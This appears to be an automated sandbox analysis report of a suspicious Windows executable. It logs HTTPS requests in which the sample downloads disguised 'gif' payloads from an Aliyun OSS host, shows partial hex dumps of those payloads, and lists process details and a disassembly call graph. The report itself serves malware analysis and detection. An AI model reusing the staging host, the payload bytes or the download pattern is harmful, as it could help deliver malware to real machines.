                                    TimestampBytes transferredDirectionData
                                    2025-01-12 03:06:06 UTC107OUTGET /b.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-12 03:06:06 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:06 GMT
                                    Content-Type: image/gif
                                    Content-Length: 125333
                                    Connection: close
                                    x-oss-request-id: 6783319E0D39F730360BF450
                                    Accept-Ranges: bytes
                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10333201072197591521
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                    x-oss-server-time: 2
                                    2025-01-12 03:06:06 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:06 UTC4096INData Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a
                                    Data Ascii: _X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
                                    2025-01-12 03:06:06 UTC4096INData Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd
                                    Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
                                    2025-01-12 03:06:06 UTC4096INData Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93
                                    Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
                                    2025-01-12 03:06:06 UTC4096INData Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90
                                    Data Ascii: ,|&#&z?JdPJ0z}|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i|k}mzf|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
                                    2025-01-12 03:06:06 UTC4096INData Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1
                                    Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{|KH
                                    2025-01-12 03:06:06 UTC4096INData Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9
                                    Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
                                    2025-01-12 03:06:06 UTC4096INData Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac
                                    Data Ascii: RWrlmnohfjkdefg`abc|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
                                    2025-01-12 03:06:06 UTC4096INData Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14
                                    Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-w*Zb*jhYklc8wP=0{y}@zvMbrqp
                                    2025-01-12 03:06:06 UTC4096INData Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52
                                    Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9|<d?p%~}~jJR


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.54998447.101.26.254436504C:\Users\user\Desktop\1387457-38765948.15.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-12 03:06:08 UTC107OUTGET /c.gif HTTP/1.1
                                    User-Agent: 3M
                                    Host: jcoiw1.oss-cn-shanghai.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-12 03:06:08 UTC545INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Sun, 12 Jan 2025 03:06:08 GMT
                                    Content-Type: image/gif
                                    Content-Length: 10681
                                    Connection: close
                                    x-oss-request-id: 678331A0E5C23A38318A5A3A
                                    Accept-Ranges: bytes
                                    ETag: "10A818386411EE834D99AE6B7B68BE71"
                                    Last-Modified: Sat, 11 Jan 2025 10:53:19 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10287299869673359293
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000103
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: EKgYOGQR7oNNma5re2i+cQ==
                                    x-oss-server-time: 1
                                    2025-01-12 03:06:08 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-12 03:06:08 UTC4096INData Raw: cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 39
                                    Data Ascii: bZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf9
                                    2025-01-12 03:06:08 UTC3034INData Raw: 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 27
                                    Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi'


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:22:04:03
                                    Start date:11/01/2025
                                    Path:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\1387457-38765948.15.exe"
                                    Imagebase:0x140000000
                                    File size:30'954'656 bytes
                                    MD5 hash:947CD5DF10D540B879C037C1CB519E63
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:6.9%
                                      Dynamic/Decrypted Code Coverage:32.8%
                                      Signature Coverage:16%
                                      Total number of Nodes:1611
                                      Total number of Limit Nodes:16
                                      execution_graph 6329 1f9b9d 6338 1f9afd 6329->6338 6332 1f9afd LoadLibraryA 6333 1f9d27 6332->6333 6334 1f9afd LoadLibraryA 6333->6334 6335 1f9d3e 6334->6335 6336 1f9dd3 6335->6336 6342 1f9e2d 6335->6342 6339 1f9b27 6338->6339 6340 1f9b81 6339->6340 6341 1f9b65 LoadLibraryA 6339->6341 6340->6332 6341->6340 6343 1f9afd LoadLibraryA 6342->6343 6344 1f9ec5 6343->6344 6345 1f9afd LoadLibraryA 6344->6345 6346 1f9f15 6345->6346 6347 1f9afd LoadLibraryA 6346->6347 6348 1f9f90 CreateThread CreateThread 6347->6348 6349 1fa00a 6348->6349 6350 1f9ded 6348->6350 6349->6336 6351 1f9dff 6350->6351 8209 14000b964 GetCommandLineA GetCommandLineW 6749 1400101e5 6752 14000d198 LeaveCriticalSection 6749->6752 8014 1400012ec 8015 1400012f7 8014->8015 8016 140003a96 VirtualAlloc 8015->8016 8017 1400035ab 8016->8017 6753 1400079ed 6765 140007917 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6753->6765 6754 140007a14 6770 1400065c4 6754->6770 6757 140007a4f 6776 14000994c 6757->6776 6759 1400065c4 _CallSETranslator 45 API calls 6760 140007a24 6759->6760 6761 140007a31 __FrameHandler3::GetHandlerSearchState 6760->6761 6762 14000994c __InternalCxxFrameHandler 36 API calls 6760->6762 6763 140007a5a 6762->6763 6764 140006244 45 API calls __InternalCxxFrameHandler 6764->6765 6765->6754 6765->6757 6765->6764 6767 14000626c 6765->6767 6768 1400065c4 _CallSETranslator 45 API calls 6767->6768 6769 14000627a 6768->6769 6769->6765 6781 1400065e0 6770->6781 6773 1400065d2 6773->6759 6773->6760 6777 140009ef8 pre_c_initialization 36 API calls 6776->6777 6778 140009957 6777->6778 6779 1400099d4 abort 36 API calls 6778->6779 6780 140009972 6779->6780 6782 1400065cd 6781->6782 6783 1400065ff GetLastError 6781->6783 6782->6773 6793 1400099d4 6782->6793 6802 140007f64 6783->6802 6815 14000be44 6793->6815 6806 140007cfc 6802->6806 6807 140007d5d TlsGetValue 6806->6807 6812 140007d58 try_get_function 6806->6812 6808 140007e40 6808->6807 6811 140007e4e GetProcAddress 6808->6811 6809 140007d8c LoadLibraryExW 6810 140007dad GetLastError 6809->6810 6809->6812 6810->6812 6811->6807 6812->6807 6812->6808 6812->6809 6813 140007e25 FreeLibrary 6812->6813 6814 140007de7 LoadLibraryExW 6812->6814 6813->6812 6814->6812 6849 14000bdfc 6815->6849 6854 14000a1d4 EnterCriticalSection 6849->6854 8210 140004770 DeleteCriticalSection 8211 14000478c __std_exception_destroy 8210->8211 8212 140006370 8214 1400063a0 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 8212->8214 8213 140006491 8214->8213 8215 14000645c RtlUnwindEx 8214->8215 8215->8214 7415 140005c73 7416 14000994c __InternalCxxFrameHandler 36 API calls 7415->7416 7417 140005c78 7416->7417 8216 140004d74 8223 14000510c SetUnhandledExceptionFilter 8216->8223 6354 5ab6cc 6355 5ab6e2 6354->6355 6367 5ad895 6355->6367 6358 5ab682 6359 5ae155 6358->6359 6371 5abc65 6359->6371 6362 5abc65 LoadLibraryA 6363 5ae241 6362->6363 6364 5abc65 LoadLibraryA 6363->6364 6365 5ae2bc CreateThread CreateThread 6364->6365 6366 5ae336 6365->6366 6375 5ae115 6365->6375 6366->6358 6368 5abc65 LoadLibraryA 6367->6368 6369 5ad936 GetSystemInfo 6368->6369 6370 5ad951 6369->6370 6370->6358 6372 5abc8f 6371->6372 6373 5abce9 6372->6373 6374 5abccd LoadLibraryA 6372->6374 6373->6362 6374->6373 6376 5ae127 6375->6376 8224 140009d78 8225 140009d92 8224->8225 8226 140009d7d 8224->8226 8230 140009d98 8226->8230 8231 140009de2 8230->8231 8232 140009dda 8230->8232 8234 14000a08c __free_lconv_num 15 API calls 8231->8234 8233 14000a08c __free_lconv_num 15 API calls 8232->8233 8233->8231 8235 140009def 8234->8235 8236 14000a08c __free_lconv_num 15 API calls 8235->8236 8237 140009dfc 8236->8237 8238 14000a08c __free_lconv_num 15 API calls 8237->8238 8239 140009e09 8238->8239 8240 14000a08c __free_lconv_num 15 API calls 8239->8240 8241 140009e16 8240->8241 8242 14000a08c __free_lconv_num 15 API calls 8241->8242 8243 140009e23 8242->8243 8244 14000a08c __free_lconv_num 15 API calls 8243->8244 8245 140009e30 8244->8245 8246 14000a08c __free_lconv_num 15 API calls 8245->8246 8247 140009e3d 8246->8247 8248 14000a08c __free_lconv_num 15 API calls 8247->8248 8249 140009e4d 8248->8249 8250 14000a08c __free_lconv_num 15 API calls 8249->8250 8251 140009e5d 8250->8251 8256 140009b80 8251->8256 8270 14000a1d4 EnterCriticalSection 8256->8270 6377 5b2445 6378 5b2455 6377->6378 6495 5b0aa5 6378->6495 6380 5b2638 6518 5afa05 6380->6518 6382 5b26b9 6383 5abc65 LoadLibraryA 6382->6383 6384 5b2887 6383->6384 6536 5af485 6384->6536 6386 5b297f 6539 5ac365 6386->6539 6389 5b2a5b 6391 5afa05 LoadLibraryA 6389->6391 6392 5b2a86 6391->6392 6544 5b00e5 6392->6544 6394 5b2aa6 6550 5b0285 6394->6550 6396 5b2b04 6555 5b03b5 6396->6555 6399 5afa05 LoadLibraryA 6400 5b2b58 6399->6400 6401 5b00e5 LoadLibraryA 6400->6401 6402 5b2b78 6401->6402 6403 5b0285 LoadLibraryA 6402->6403 6404 5b2bd6 6403->6404 6564 5b1bf5 6404->6564 6406 5b2c1e 6407 5b03b5 LoadLibraryA 6406->6407 6408 5b2c4d 6407->6408 6409 5afa05 LoadLibraryA 6408->6409 6410 5b2c6a 6409->6410 6411 5b00e5 LoadLibraryA 6410->6411 6412 5b2c8a 6411->6412 6413 5b0285 LoadLibraryA 6412->6413 6414 5b2ce8 6413->6414 6568 5b1cc5 6414->6568 6417 5b03b5 LoadLibraryA 6418 5b2d31 6417->6418 6419 5afa05 LoadLibraryA 6418->6419 6420 5b2d4e 6419->6420 6421 5b00e5 LoadLibraryA 6420->6421 6422 5b2d6e 6421->6422 6423 5b0285 LoadLibraryA 6422->6423 6424 5b2dcc 6423->6424 6425 5b1cc5 LoadLibraryA 6424->6425 6426 5b2de6 6425->6426 6427 5b03b5 LoadLibraryA 6426->6427 6428 5b2e15 6427->6428 6571 5b0925 6428->6571 6431 5b0925 LoadLibraryA 6432 5b2e2f 6431->6432 6433 5b0925 LoadLibraryA 6432->6433 6434 5b2e3c 6433->6434 6435 5b0925 LoadLibraryA 6434->6435 6436 5b2e49 6435->6436 6437 5abc65 LoadLibraryA 6436->6437 6438 5b2f34 6437->6438 6439 5abc65 LoadLibraryA 6438->6439 6440 5b2ff3 6439->6440 6441 5abc65 LoadLibraryA 6440->6441 6442 5b3007 6441->6442 6443 5abc65 LoadLibraryA 6442->6443 6444 5b3039 6443->6444 6576 5b1135 6444->6576 6446 5b3051 6447 5afa05 LoadLibraryA 6446->6447 6448 5b3163 6447->6448 6449 5b03b5 LoadLibraryA 6448->6449 6452 5b3198 6449->6452 6450 5b36ca 6609 5ab525 6450->6609 6452->6450 6453 5b31c8 6452->6453 6454 5afa05 LoadLibraryA 6453->6454 6455 5b3282 6454->6455 6456 5b00e5 LoadLibraryA 6455->6456 6457 5b32a2 6456->6457 6458 5b0285 LoadLibraryA 6457->6458 6459 5b3300 6458->6459 6460 5abc65 LoadLibraryA 